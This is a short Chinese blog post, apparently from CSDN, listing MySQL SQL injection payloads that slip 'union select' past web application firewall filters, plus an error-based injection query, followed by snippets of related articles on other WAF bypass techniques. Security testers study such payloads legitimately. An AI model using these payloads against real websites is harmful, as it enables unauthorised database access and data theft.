一些绕过waf的手段

最新推荐文章于 2022-05-19 20:36:57 发布
最新推荐文章于 2022-05-19 20:36:57 发布
阅读量868 收藏
点赞数
分类专栏: 防火墙绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p656456564545/article/details/49822225
版权

\bunion select\b的过滤绕过(mysql数据库)

  select 1 from user  where islock= -1.%0bunion select user()

select 1 from user where islock=1+100.union select user()

select 1 from user where islock=1 and 1=1.union select user()

select 2 from user where islock=1 union select.``.account from user




不用select ,但是只能局限于本表和知道字段名称

select * from user where islock=0 and mid(account,1,1)!='c' xor 1 group by concat(version(),floor(rand(0)*2)) having min(0)

爬虫仔蛙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
第46天-WAF绕过-信息收集之反爬虫延时代理池技术
MCTSOG的博客
04-08 1859
思维导图 演示案例: Safedog-默认拦截机制分析绕过-未开 CC safedog ——CC攻击防护默认是关闭的 1—用目录扫描工具扫 字典的所有的结果都有,明显错误! 抓取进程的抓包工具抓包,与浏览器数据包对比,明显请求方式不同 改为GET请求方式,就是正常的扫描结果! Safedog-默认拦截机制分析绕过-开启 CC 开启CC防护 查看防护规则 开启CC之后,再次使用扫描工具,并且访问网站。 频繁访问(访问频率过快,绝对是工具),触发安全狗防护机制,被拦截 设置延时扫描时间 或者
(46.3)【WAF绕过】基于WAF的规则绕过、旁路、云waf、白名单
05-13 1074
WAF绕过】针对规则绕过
WAF绕过思路
永远是少年
03-12 3441
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
web渗透测试中WAF绕过讲解(一)
ZDH5362的博客
08-20 671
---恢复内容开始--- 0x01 前言 许多Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断的骚操作绕过WAF与Hacker总是在斗智斗勇,经过长时间的发展,近年越来越多的Hacker投入到与WAF进行对抗,相对应的绕过方法也被大量的暴露出来,笔者今日就先进行个小小的科普先来说说WAF是什么。 0x02 什么是WAF? ...
上传绕过WAF几种常见的姿势
diechusi8056的博客
02-06 269
1:WTS-WAF 绕过上传 原内容: Content-Disposition: form-data; name="up_picture"; filename="xss.php" 添加回车 Content-Disposition: form-data; name="up_picture"; filename="xss.ph p" 2:百度云上传绕过见下: 百度云...
WAF绕过的各种姿势
浅笑996的博客
10-23 2447
主要思路: 根据WAF部署位置,针对WAF、WEB服务器、WEB应用对协议解析、字符解析、文件名解析、编码解析以及SQL语法解析的差异,绕过WAF,将payload送至服务器执行。 常用绕过方法: 1.转换特征字符大小写 2.利用注释绕过 3.编码特征字符绕过 4.分隔重写特征字符绕过 5.利用截断字符绕过 6.变换变量位置绕过 7.针对域名保护的绕过 8.超大数据包绕过 9.转换数据提交方式绕过...
WAF介绍及常见绕过方法
qq_41320827的博客
02-20 8416
一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 1.工作原理 对web应用程序客户端发出的流量进行内容检测和验证,检测其安全性与合法性,来屏蔽常见的网站漏洞攻击,如SQL注入,XML注入、XSS等。 2.WAF分类 软件型WAF 以软件形式装在所保护的服务器...
Python编写脚本绕过WAF
Grey的博客
07-15 4259
环境搭建: 网上在i春秋找的源码进行搭建 Fuzz脚本思路 如果有某狗存在的话,会对特殊字符进行拦截 所以我们需要自己构造payload Fuzz脚本编写 fuzz脚本样例 #! -*- encoding:utf-8 -*- # python3 import requests fuzz_zs = ['/*','*/','/*!','*','=','`','!',...
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
那些年我们绕过WAF
05-07
本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF绕过,希望对大家有帮助。
渗透测试-WAF绕过通用思路
cdyunaq的博客
03-14 2967
概述:通用的方法,不仅限于 SQL 注入,就是万金油,无非就是大小写、双写、编码、注释、垃圾字符、分块传输、HPP、WAF 特性等 核心:所有能改的地方,都捣鼓捣鼓改改,增加就加,能删就删,多拿点其他内容来混淆视听。 大小写 unIoNSelect 双写 一些后端可能会直接给关键词过滤为空,那么就可以利用双写来绕过 ununionion==>去掉union==>union 编码 URL 编码 Unicode 编码 十六进制编码 ...
<web渗透-waf绕过
weixin_45540964的博客
11-19 250
WAF绕过 定义: Web应用防护系统(Web Application Firewall, 简称:WAF) 代表了一类新兴的信息安全技术, 用以解决诸如防火墙一类传统设备束手无策的Web应用安全问题。 【*】熟练掌握mysql函数和语法使用方法 输入了解中间件运行处理机制 了解WAF防护原理和方法 【白盒绕过】 sqli-25关 使用了blacklist函数过滤了’or’和’AND’ 绕过过滤 (1)大小写变形:oR,OR, (2)等价替换: and->&& o.
渗透测试中waf命令执行的绕过经验技巧
渗透测试教程
02-17 588
管道符 ; 顺序执行,命令之间没有逻辑关系 正常顺序执行 && 逻辑与; 当命令1正确执行后,才会执行命令2。否则命令2不会执行 两个命令都会执行 || 逻辑或; 当命令1不正确执行后,命令2才会执行。否则命令2不会执行 mi 会执行whom 其他特殊符号 符号 作用 ’ 单引号,在单引号中所有的特殊符号,如“$”和“`”(反引号)都无特殊含义 " 双引号,在双引号中特殊符号都无特殊含义,但“$”、“`”(反引号)和“\”是例外,拥
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 3666
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
WAF绕过大全
yggcwhat
05-19 1246
WAF绕过大全
前18大旋转修整器企业占据全球87%的市场份额.docx
最新发布
05-06
前18大旋转修整器企业占据全球87%的市场份额
sqlmapapi绕过waf
09-04
此外,还可以使用一些其他技巧,比如使用0xA0代替空格、利用特殊用法如\N和.e浮点绕过WAF,以及使用&&代替and等关键字和大括号注释来绕过WAF。这些方法可以绕过一些WAF对SQL注入的过滤规则。 另外,还可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值